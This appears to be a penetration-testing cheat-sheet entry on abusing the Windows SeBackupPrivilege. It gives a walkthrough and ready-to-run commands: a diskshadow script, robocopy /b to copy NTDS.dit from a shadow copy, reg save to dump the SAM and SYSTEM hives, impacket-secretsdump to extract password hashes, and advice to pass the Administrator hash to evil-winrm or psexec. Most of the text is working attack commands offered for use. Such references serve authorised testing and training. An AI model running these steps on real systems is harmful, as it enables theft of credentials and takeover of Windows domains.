← Back to search

SeBackupPrivilege — Dump SAM/SYSTEM (or NTDS)

privescwindowstool

Summary

SeBackupPrivilege lets you read any file regardless of ACLs. Use a shadow copy to grab NTDS.dit (on a DC) or save the SAM/SYSTEM hives, then dump hashes offline with secretsdump.

Walkthrough

SeBackupPrivilege grants the right to read any file on disk, ignoring its ACL (intended for backup software). That is enough to steal the hash stores.

On a Domain Controller — steal NTDS.dit

  1. Write viper.dsh on Kali, then unix2dos viper.dsh so diskshadow accepts it.
  2. Transfer it to the target and run diskshadow /s viper.dsh to create a

shadow copy exposed as x:.

  1. robocopy /b copies ntds.dit off the shadow copy — the /b (backup) flag

is what abuses the privilege.

  1. Also save the SYSTEM hive (needed to decrypt NTDS).

On a member/standalone host — steal SAM

  • reg save the SAM and SYSTEM hives to a writable folder, exfil them, then

run secretsdump locally to recover local account hashes.

Pass the resulting Administrator hash to evil-winrm or psexec.

Commands

other

# viper.dsh (create on Kali, then convert line endings)
set context persistent nowriters
add volume c: alias viper
create
expose %viper% x:

bash

unix2dos viper.dsh

cmd

# On target: run the shadow-copy script
diskshadow /s viper.dsh

cmd

# Copy NTDS.dit off the shadow copy (backup flag bypasses ACLs)
robocopy /b x:\windows\ntds . ntds.dit

cmd

# Or, on a normal box, grab the SAM + SYSTEM hives
reg save hklm\system C:\windows\tasks\system
reg save hklm\sam C:\windows\tasks\sam

bash

# Extract hashes offline
impacket-secretsdump -ntds ntds.dit -system system local
impacket-secretsdump -sam sam -system system local